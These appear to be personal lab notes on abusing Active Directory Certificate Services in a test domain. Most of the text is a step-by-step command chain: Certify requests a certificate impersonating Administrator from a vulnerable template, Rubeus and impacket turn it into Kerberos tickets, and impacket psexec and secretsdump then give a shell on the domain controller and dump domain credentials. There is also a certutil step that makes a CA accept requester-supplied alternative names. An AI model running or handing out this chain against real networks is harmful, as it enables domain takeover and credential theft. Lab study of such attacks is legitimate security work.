certutil stuff

certutil -getreg policy\EditFlags

Vulnerable ADCS certs

1. Certificate authority => Certificate templates => right click => manage => right click "user" template and clone => "Subject Name" category, supply in the request

   1. certify.exe find /vulnerable

      1. msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT

   2. .\\Certify.exe request /ca:DC01.test.local\\test-DC01-CA /template:Vuln-Cert /altname:Administrator

      CA Name                               : DC01.test.local\\test-DC01-CA
      Template Name                         : Vuln-Cert
      

   3. copy output to a cert.pem

   4. convert to a pfx openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

   5. get a tgt for administrator .\\Rubeus.exe asktgt /user:Administrator /ptt /nowrap /certificate:cert.pfx

   6. request service for it .\\rubeus.exe asktgs /nowrap /user:Administrator /service:cifs/dc01.test.local /ticket:<base64 here>

   7. Rubeus whack, use impacket ⇒ base64 -d cifs.b64 > cifs.kirbi ⇒impacket-ticketConverter cifs.kirbi cifs.ccache ⇒ export KRB5CCNAME=cifs.ccache

      1. impacket-psexec -dc-ip 192.168.179.3 -target-ip 192.168.179.3 -k -no-pass test.local/[email protected]
      2. impacket-secretsdump -just-dc -dc-ip 192.168.179.3 -target-ip 192.168.179.3 -k -no-pass test.local/[email protected]
2. Make it such that SAN can be specified within the certificates “request attributes” certutil -setreg policy\\EditFlags +EDITF_ATTRIBUTESUBJECTALTNAME2

Wildcard Certificate

https://www.petenetlive.com/KB/Article/0001128 (password abc)

1. mmc
2. add certificates snap in, computer account, local computer ⇒ OK
3. personal ⇒ advanced operations ⇒ custom req
4. proceed without enrollment policy ⇒ default ⇒ certificate information, check the properties
5. friendly name: *.test.local ⇒ cn: *.test.local